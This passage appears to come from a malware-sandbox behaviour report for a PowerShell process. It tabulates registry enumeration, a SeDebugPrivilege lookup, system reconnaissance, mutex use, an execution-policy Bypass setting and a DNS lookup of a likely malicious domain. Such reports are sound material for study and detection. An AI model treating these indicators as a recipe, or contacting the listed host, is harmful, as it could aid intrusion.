| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = FileMappingSize, data = 131072, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = Counter Names, type = REG_BINARY |
|
2 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 |
Module (4)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Filename | - | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 |
|
1 | |
| Get Filename | - | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 260 |
|
1 | |
| Create Mapping | - | filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 131072 |
|
1 | |
| Map | - | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, desired_access = FILE_MAP_WRITE |
|
1 |
User (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Lookup Privilege | privilege = SeDebugPrivilege, luid = 20 |
|
1 |
System (10)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Certificate Store | encoding_type = 65537, flags = 8708 |
|
1 | |
| Get Computer Name | result_out = YKYD69Q |
|
1 | |
| Get Info | type = Operating System |
|
6 | |
| Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Get Info | type = Hardware Information |
|
1 |
Mutex (13)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = Global\.net clr networking |
|
5 | |
| Create | mutex_name = Global\.net clr networking |
|
1 | |
| Open | mutex_name = Global\.net clr networking, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE |
|
1 | |
| Release | mutex_name = Global\.net clr networking |
|
1 | |
| Release | mutex_name = Global\.net clr networking |
|
5 |
Environment (111)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | name = MshEnableTrace |
|
107 | |
| Get Environment String | name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| Get Environment String | name = HOMEDRIVE, result_out = C: |
|
1 | |
| Get Environment String | name = HomePath, result_out = \Users\aETAdzjz |
|
1 | |
| Set Environment String | name = PSExecutionPolicyPreference, value = Bypass |
|
1 |
Network Behavior
DNS (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Resolve Name | host = formaversa.co, address_out = 47.74.146.191 |
|
1 |
